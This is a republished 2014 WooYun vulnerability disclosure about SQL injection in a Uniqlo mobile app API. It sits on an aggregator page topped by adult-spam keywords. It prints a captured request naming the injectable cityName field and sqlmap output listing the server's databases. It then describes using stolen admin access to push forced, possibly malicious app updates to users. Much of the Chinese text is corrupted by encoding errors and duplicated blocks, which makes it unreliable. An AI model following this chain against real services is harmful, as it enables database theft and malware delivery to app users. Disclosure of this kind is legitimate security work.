日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) >

mysql 主键 uniqo_优衣库某处SQL注入可导致移动平台被劫持

發(fā)布時(shí)間:2025/3/20 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 mysql 主键 uniqo_优衣库某处SQL注入可导致移动平台被劫持 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

漏洞概要

缺陷編號(hào):WooYun-2014-073739

漏洞標(biāo)題:優(yōu)衣庫(kù)某處SQL注入可導(dǎo)致移動(dòng)平臺(tái)被劫持

相關(guān)廠商:優(yōu)衣庫(kù)

漏洞作者:winsyk

提交時(shí)間:2014-08-25 10:08

公開時(shí)間:2014-11-23 10:10

漏洞類型:用戶敏感數(shù)據(jù)泄漏

危害等級(jí):高

自評(píng)Rank:20

漏洞狀態(tài):未聯(lián)系到廠商或者廠商積極忽略

Tags標(biāo)簽:

漏洞詳情

披露狀態(tài):

2014-08-25: 積極聯(lián)系廠商并且等待廠商認(rèn)領(lǐng)中,細(xì)節(jié)不對(duì)外公開

2014-11-23: 廠商已經(jīng)主動(dòng)忽略漏洞,細(xì)節(jié)向公眾公開

簡(jiǎn)要描述:

不要在意這些細(xì)節(jié)

詳細(xì)說明:

閑著無聊,于是上優(yōu)衣庫(kù)看衣服,因?yàn)槭且苿?dòng)app瞎測(cè)試了一下,發(fā)現(xiàn)了多處注入問題,這里就簡(jiǎn)單說說吧。。

漏洞證明:

#漏洞發(fā)現(xiàn):通過抓包得到如下信息:

*****oreHome/axis*****

1

*****oreHome/axis*****

screenSize: 1080x1920

platform: android

model: MI

osversition: 4.4.2

clientVer: 2.2.0

carrier:

subSourceId: UnqA18

udid: 8648950202687412

macAddress: 15:f6:5a:**:**:**

protocolVer: 2.2.0

weblogid:

sourceId: UnqA18

accept-encoding: gzip, deflate

Content-Length: 101

Content-Type: application/x-www-form-urlencoded

Host: **.**.**.**

Connection: Keep-Alivenum=&longitude=121.385568&latitude=31.317182&isHotShop=&cityName=%E4%B8%8A%E6%B5%B7%E5%B8%82&keyword=

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

screenSize:1080x1920

platform:android

model:MI

osversition:4.4.2

clientVer:2.2.0

carrier:

subSourceId:UnqA18

udid:8648950202687412

macAddress:15:f6:5a:**:**:**

protocolVer:2.2.0

weblogid:

sourceId:UnqA18

accept-encoding:gzip,deflate

Content-Length:101

Content-Type:application/x-www-form-urlencoded

Host:**.**.**.**

Connection:Keep-Alivenum=&longitude=121.385568&latitude=31.317182&isHotShop=&cityName=%E4%B8%8A%E6%B5%B7%E5%B8%82&keyword=

對(duì)上述post字段,簡(jiǎn)單測(cè)了下發(fā)現(xiàn)cityName 字段存在注入。#2 漏洞證明:通過讀取信息得到如下表,具體信息就不貼了。

web application technology: PHP 5.4.0, Nginx

back-end DBMS: MySQL 5.0

[20:58:17] [INFO] fetching database names

[20:58:17] [INFO] the SQL query used returns 12 entries

[20:58:17] [INFO] resumed: "information_schema"

[20:58:17] [INFO] resumed: "father"

[20:58:17] [INFO] resumed: "mysql"

[20:58:17] [INFO] resumed: "performance_schema"

[20:58:17] [INFO] resumed: "push"

[20:58:17] [INFO] resumed: "push_android"

[20:58:17] [INFO] resumed: "sq_uniqlo"

[20:58:17] [INFO] resumed: "statistics"

[20:58:17] [INFO] resumed: "test"

[20:58:17] [INFO] resumed: "uniqlocms"

[20:58:17] [INFO] resumed: "yek_mob"

[20:58:17] [INFO] resumed: "yek_mob_media"

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

webapplicationtechnology:PHP5.4.0,Nginx

back-endDBMS:MySQL5.0

[20:58:17][INFO]fetchingdatabasenames

[20:58:17][INFO]theSQLqueryusedreturns12entries

[20:58:17][INFO]resumed:"information_schema"

[20:58:17][INFO]resumed:"father"

[20:58:17][INFO]resumed:"mysql"

[20:58:17][INFO]resumed:"performance_schema"

[20:58:17][INFO]resumed:"push"

[20:58:17][INFO]resumed:"push_android"

[20:58:17][INFO]resumed:"sq_uniqlo"

[20:58:17][INFO]resumed:"statistics"

[20:58:17][INFO]resumed:"test"

[20:58:17][INFO]resumed:"uniqlocms"

[20:58:17][INFO]resumed:"yek_mob"

[20:58:17][INFO]resumed:"yek_mob_media"

通過讀取admin表,得到信息,登錄后臺(tái),這些都不是重點(diǎn)。#劫持用戶,登錄后臺(tái)的這些可以參考后臺(tái):

http://**.**.**.**/bugs/wooyun-2010-050662從后臺(tái)發(fā)現(xiàn)可以添加版本更新,這就好玩了。。

這里的推送,可以選擇“可選更新”、“強(qiáng)制更新”。簡(jiǎn)單發(fā)個(gè)圖,ios和android 用戶都可被劫持。。ios的話,就是指app store!

注意:這里的劫持不是普通的軟件劫持,而是實(shí)實(shí)在在的更新,這個(gè)時(shí)候如果你越獄了,我可以給你推送個(gè)已經(jīng)有病毒的軟件,讓你安裝,后果……而且,這個(gè)東西可以強(qiáng)制更新!對(duì)廠商對(duì)用戶來說都是個(gè)大風(fēng)險(xiǎn),可以用來強(qiáng)推其他廠商的軟件,這樣優(yōu)衣庫(kù)……

修復(fù)方案:

1、修復(fù)注入點(diǎn);2、對(duì)訪問后臺(tái)做控制。3、僅僅測(cè)試,未對(duì)后臺(tái)數(shù)據(jù)做任何下載行為……

漏洞回應(yīng)

廠商回應(yīng):

未能聯(lián)系到廠商或者廠商積極拒絕

評(píng)價(jià)

總結(jié)

以上是生活随笔為你收集整理的mysql 主键 uniqo_优衣库某处SQL注入可导致移动平台被劫持的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。